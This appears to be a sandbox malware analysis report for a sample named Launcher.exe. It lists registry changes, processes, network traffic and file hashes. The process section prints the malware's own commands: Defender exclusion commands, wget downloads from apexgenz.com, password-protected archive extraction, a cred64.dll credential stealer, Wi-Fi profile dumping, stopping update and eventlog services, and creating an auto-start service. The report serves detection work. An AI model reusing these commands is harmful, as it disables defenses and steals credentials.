| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
Enumerates physical storage devices
Program crash
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f | C:\Users\Admin\AppData\Local\Temp\Launcher.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f | C:\Users\Admin\AppData\Local\Temp\Launcher.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad040000000100000010000000c5dfb849ca051355ee2dba1ac33eb0282000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f | C:\Users\Admin\AppData\Local\Temp\Launcher.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 5c000000010000000400000000080000040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f | C:\Users\Admin\AppData\Local\Temp\Launcher.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD | C:\Users\Admin\AppData\Local\Temp\Launcher.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\3plugin14170 | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\sihost.exe
sihost.exe
C:\Users\Admin\AppData\Local\Temp\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Launcher.exe"
C:\Users\Admin\AppData\Roaming\services\Launhcer.exe
"C:\Users\Admin\AppData\Roaming\services\Launhcer.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # if ($AdminRightsRequired) { # try { Start-Process -FilePath '.\data\Launcher.exe' -Verb RunAs -Wait # break } catch { Write-Host 'Error 0xc0000906' } } else { # break } } } Get-Win"
C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe
"C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "
C:\Users\Admin\AppData\Roaming\services\wget.exe
"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/1/1 -P C:\Users\Admin\AppData\Roaming\services
C:\Users\Admin\AppData\Roaming\services\winrar.exe
"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\01plugins*.* "plugin*" C:\Users\Admin\AppData\Roaming\services
C:\Users\Admin\AppData\Roaming\services\plugin4559
C:\Users\Admin\AppData\Roaming\services\plugin4559
C:\Users\Admin\AppData\Roaming\services\wget.exe
"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/2/1 -P C:\Users\Admin\AppData\Roaming\services
C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1236 -ip 1236
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1236 -s 620
C:\Users\Admin\AppData\Roaming\services\winrar.exe
"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\02plugins*.* "2plugin*" C:\Users\Admin\AppData\Roaming\services
C:\Users\Admin\AppData\Roaming\services\2plugin29017
C:\Users\Admin\AppData\Roaming\services\2plugin29017
C:\Users\Admin\AppData\Roaming\services\wget.exe
"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/3/1 -P C:\Users\Admin\AppData\Roaming\services
C:\Users\Admin\AppData\Roaming\services\winrar.exe
"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\03plugins*.* "3plugin*" C:\Users\Admin\AppData\Roaming\services
C:\Users\Admin\AppData\Roaming\services\3plugin14170
C:\Users\Admin\AppData\Roaming\services\3plugin14170
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1348 -ip 1348
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 856
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1348 -ip 1348
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 900
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1348 -ip 1348
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 968
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1348 -ip 1348
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 1044
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1348 -ip 1348
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 1028
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1348 -ip 1348
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 1020
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1348 -ip 1348
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 1268
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 1348 -ip 1348
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 1304
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 1348 -ip 1348
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 1328
C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe
"C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 1348 -ip 1348
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 1200
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1348 -ip 1348
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 976
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1940 -ip 1940
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1940 -s 684
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1940 -ip 1940
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1940 -s 704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1940 -ip 1940
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1940 -s 692
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1940 -ip 1940
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1940 -s 708
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1940 -ip 1940
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1940 -s 896
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1940 -ip 1940
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1940 -s 916
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 1940 -ip 1940
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1940 -s 916
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 1940 -ip 1940
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1940 -s 988
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1940 -ip 1940
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1940 -s 1052
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1940 -ip 1940
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1940 -s 1052
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1940 -ip 1940
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1940 -s 1400
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 1940 -ip 1940
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1940 -s 1640
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\1000012011\cb100c325f.dll, Main
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /K rd /s /q "C:\Users\Admin\AppData\Roaming\services" & EXIT
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\cred64.dll, Main
C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\cred64.dll, Main
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\cred64.dll, Main
C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\cred64.dll, Main
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "OZLCSUZD"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "OZLCSUZD" binpath= "C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe" start= "auto"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "OZLCSUZD"
C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe
C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\cred64.dll, Main
C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\cred64.dll, Main
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\netsh.exe
netsh wlan show profiles
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | apexgenz.com | udp |
| NL | 185.14.29.199:80 | apexgenz.com | tcp |
| US | 8.8.8.8:53 | fellzobr.com | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 199.29.14.185.in-addr.arpa | udp |
| NL | 185.14.29.199:80 | fellzobr.com | tcp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| NL | 185.14.29.199:80 | fellzobr.com | tcp |
| NL | 89.23.103.42:80 | tcp | |
| IT | 185.196.10.188:80 | 185.196.10.188 | tcp |
| NL | 45.159.189.140:80 | tcp | |
| NL | 185.14.29.199:80 | fellzobr.com | tcp |
| US | 8.8.8.8:53 | 188.10.196.185.in-addr.arpa | udp |
| IT | 185.196.10.188:80 | 185.196.10.188 | tcp |
| NL | 89.23.103.42:80 | tcp | |
| NL | 45.159.189.140:80 | tcp | |
| NL | 89.23.103.42:80 | tcp | |
| IT | 185.196.10.188:80 | 185.196.10.188 | tcp |
| NL | 89.23.103.42:80 | tcp | |
| IT | 185.196.10.188:80 | 185.196.10.188 | tcp |
| NL | 89.23.103.42:80 | tcp |
Files
C:\Users\Admin\AppData\Roaming\services\Launhcer.exe
| MD5 | e5c00b0bc45281666afd14eef04252b2 |
| SHA1 | 3b6eecf8250e88169976a5f866d15c60ee66b758 |
| SHA256 | 542e2ebbded3ef0c43551fb56ce44d4dbb36a507c2a801c0815c79d9f5e0f903 |
| SHA512 | 2bacd4e1c584565dfd5e06e492b0122860bfc3b0cc1543e6baded490535309834e0d5bb760f65dbfb19a9bb0beddb27a216c605bbed828810a480c8cd1fba387 |
C:\Users\Admin\AppData\Roaming\services\Launhcer.dll
| MD5 | 7de0541eb96ba31067b4c58d9399693b |
| SHA1 | a105216391bd53fa0c8f6aa23953030d0c0f9244 |
| SHA256 | 934f75c8443d6379abdc380477a87ef6531d0429de8d8f31cd6b62f55a978f6e |
| SHA512 | e5ffa3bfd19b4d69c8b4db0aabaf835810b8b8cccd7bc400c7ba90ef5f5ebd745c2619c9a3e83aa6b628d9cf765510c471a2ff8cb6aa5ad4cf3f7826f6ae84a3 |
C:\Users\Admin\AppData\Roaming\services\Launhcer.exe.manifest
| MD5 | f0fc065f7fd974b42093594a58a4baef |
| SHA1 | dbf28dd15d4aa338014c9e508a880e893c548d00 |
